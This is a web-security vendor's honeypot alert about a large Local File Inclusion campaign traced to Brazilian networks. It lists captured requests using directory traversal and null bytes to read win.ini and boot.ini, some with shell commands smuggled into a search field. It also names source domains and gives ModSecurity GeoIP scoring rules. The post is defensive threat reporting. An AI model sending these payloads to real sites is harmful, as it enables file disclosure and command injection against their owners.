[Honeypot Alert] Large Scale LFI Attack From Brazillian Domains

Our web sensors picked up a big uptick in Local File Inclusion (LFI) attacks today. We received 3675 attacks that targeted a wide range of applications all attempting to use directory traversals to access:

• Windowswin.ini
• boot.ini

Here is a sampling of attack payloads:

GET /forum/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
GET /forum/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
GET /forum/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
GET /sites/all/libraries/fckeditor/editor/dialog/fck_spellerpages/spellerpages/controls.html?btnUndo=Undo&misword=1&sugg=&txtsugg=../../../../../../../../../../windows/win.ini%00
GET /sites/all/libraries/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFolders&CurrentFolder=/&Type=../../../../../../../../../../windows/win.ini%00
GET /sites/all/libraries/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&CurrentFolder=/&Type=../../../../../../../../../../windows/win.ini%00
GET /wp-trackback.php?p=..........................................Windowswin.ini%00
GET /take-quiz/index.php?album=../../../../../../../../../../boot.ini%00
GET /take-quiz/index.php?album=../../../../../../../../../../boot.ini%00
GET /forum.php?mod=viewthread&tid=..........................................Windowswin.ini%00
GET /index.php?main_page=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=/boot.ini%00
GET /index.php?main_page=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=site_map&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=site_map&zenid=/boot.ini%00GET /index.php?main_page=featured_products&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=featured_products&zenid=/boot.ini%00GET /index.php?main_page=product_info&products_id=638&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=product_info&products_id=638&zenid=/boot.ini%00GET /index.php?main_page=page&id=1&chapter=0&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=page&id=1&chapter=0&zenid=/boot.ini%00GET /index.php?main_page=shippinginfo&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=shippinginfo&zenid=/boot.ini%00GET /index.php?main_page=privacy&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=privacy&zenid=/boot.ini%00GET /index.php?main_page=conditions&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=conditions&zenid=/boot.ini%00GET /wp-content/plugins/download-monitor/download.php?id=..........................................Windowswin.ini%00GET /forums/viewtopic.php?f=11&t=18551&p=444445&hilit=..........................................Windowswin.ini%00GET /index.php?main_page=contact_us&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=contact_us&zenid=/boot.ini%00GET /index.php?main_page=site_map&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=site_map&zenid=/boot.ini%00GET /index.php?main_page=gv_faq&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=gv_faq&zenid=/boot.ini%00GET /index.php?main_page=discount_coupon&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=discount_coupon&zenid=/boot.ini%00GET /index.php?main_page=unsubscribe&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=unsubscribe&zenid=/boot.ini%00GET /index.php?main_page=reviews&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=reviews&zenid=/boot.ini%00GET /index.php?main_page=product_reviews_info&products_id=638&reviews_id=25&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=product_reviews_info&products_id=638&reviews_id=25&zenid=/boot.ini%00GET /index.php?main_page=specials&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=specials&zenid=/boot.ini%00GET /index.php?main_page=advanced_search_result&search_in_description=1&zenid=p3hpsf70l0q8pg8sar4t8snr46&keyword=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=advanced_search_result&search_in_description=1&zenid=p3hpsf70l0q8pg8sar4t8snr46&keyword=/boot.ini%00GET /index.php?main_page=index&manufacturers_id=303&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=index&manufacturers_id=303&zenid=/boot.ini%00GET /index.php?main_page=login&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=login&zenid=/boot.ini%00GET /index.php?main_page=index&cPath=332&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=index&cPath=332&zenid=/boot.ini%00GET /index.php?main_page=featured_products&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=featured_products&zenid=/boot.ini%00GET /index.php?showtopic=..........................................Windowswin.ini%00GET /index.php?main_page=product_info&products_id=49354&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=product_info&products_id=49354&zenid=/boot.ini%00

We identified this attack through two methods of our commercial rules feed:

• LFI virtual patching rules
• A big increase in unique malicious IP addresses (for our IP Reputation Feed). We normally have between 500-800 IP addresses in our list per-day. Today's IP Reputation Blacklist jumped up to 2339.

After analyzing the source IP addresses, it was clear that this LFI attack campaign was orchestrated by attacker(s) in Brazil. Here is a listing of the Brazillian domains we identified:

ac.gov.br
aerotelecom.com.br
ampernet.com.br
atena.anhembi.ind.br
brma.santacasasp.org.br
cable.cabotelecom.com.br
cable.infolic.com.br
certelnet.com.br
cianetwork.com.br
claro.net.br
cpnet.com.br
customer.tdatabrasil.net.br
customer.telesp.net.br
dedicated.neoviatelecom.com.br
ded.intelignet.com.br
ded.srt.net.br
desktop.com.br
dezinternet.com.br
dial-up.telesp.net.br
din.wln.net.br
dsl.brasiltelecom.net.br
dsl.ccoce700.brasiltelecom.net.br
dsl.pmjce700.brasiltelecom.net.br
dsl.telesp.net.br
dynamic.adsl.gvt.net.br
dynamic.conectcor.com.br
dynamic.dialup.gvt.net.br
dynamic.idial.com.br
dynamic.neoviatelecom.com.br
e.brasiltelecom.net.br
e.ccoce700.brasiltelecom.net.br
e.pmjce700.brasiltelecom.net.br
fia.com.br
fw-cruz2.mma.com.br
gaccbahia.sdr.gvt.net.br
gate.futurecomp.com.br
geoposition.com.br
gw-acad-pf.upf.br
hc-gw.unicamp.br
host.gvt.net.br
http.kraftweb.com.br
ibys.com.br
i-next.psi.br
intercampo.com.br
interline.net.br
ip18.unb.org.br
ipd.brasiltelecom.net.br
ipd.brcentral.net.br
isa2.eptv.com.br
isp.timbrasil.com.br
itake.net.br
jupiter.sulpol.com.br
kratos.tdkom.psi.br
mail01.fundacaoaltinoventura.org.br
mail2.metroval.com.br
mail6.aralco.com.br
mail.aralco.com.br
mail.centraldopapel.com.br
mail.hci.ind.br
mail.nardini.ind.br
marinter.com.br
marte.ceron.com.br
mhnet.com.br
minasmaistelecom.com.br
mobile.jabursat.com.br
mx.0.rossi.com.br
neowave.com.br
nereu.vipway.net.br
nqt.com.br
ns1.vipel.ind.br
ns.argosguindastes.com.br
osprey2.certelnet.com.br
osprey.certelnet.com.br
p4net.com.br
poolip.BHE.embratel.net.br
prontonet.com.br
provale.com.br
proxy1.recife.pe.gov.br
rco.gvt.net.br
res-com.wayinternet.com.br
res-com.wayinternet.com.br
rline.com.br
sercomtel.com.br
server.smsr.com.br
servidor1.actioncentro.net.br
speedycti.com.br
srv.tecnolab.com.br
static.ctbctelecom.com.br
static.gotelecom.com.br
static.gvt.net.br
static.impsat.net.br
static.ntbr.com.br
static-pr082.redetelesul.com.br
static.spo.ctbc.com.br
static.starweb.net.br
static.stech.net.br
static-stz.convex.com.br
tcvnet.com.br
telemar.net.br
tpa.net.br
tpnet.psi.br
ufpa.br
uninetbsb.com.br
unotel.com.br
user.ajato.com.br
user.dynamic.dipelnet.com.br
user.superilinhares.com.br
user.superitelecom.com.br
user.veloxzone.com.br
user.vivozap.com.br
v4.naclick.com.br
veiculos.jelta.com.br
viacaboip.com.br
viaembratel.net.br
viafibra.com.br
virtua.com.br
wcs.net.br
web.ceralpisos.com.br
webmail.ro.senac.br
wifi.tcheturbo.com.br
wlan.lpnet.com.br
www2.ceralpisos.com.br
xd-dynamic.ctbcnetsuper.com.br
xdsl-dinamico.ctbcnetsuper.com.br

Assigning Risk Scores

If you are using ModSecurity to protect your web applications, and your user-base does not normally originate in Brazil, you may want to consider implementing some GeoIP rules to help raise the potential Threat Score.

SecGeoLookupDb /path/to/apache/conf/base_rules/GeoLiteCity.datSecRule REMOTE_ADDR "@geoLookup" "phase:1,t:none,nolog,pass"SecRule GEO:COUNTRY_CODE "@pm BR" "phase:1,t:none,log,pass,msg:'High Risk Source Location',setvar:tx.threat_score=+10"

This would raise the Threat Score for this transaction. You could, however, even block based solely on this information if you were sure that you have no legitimate clients from this geographic location. Simply change the "pass" action to "block".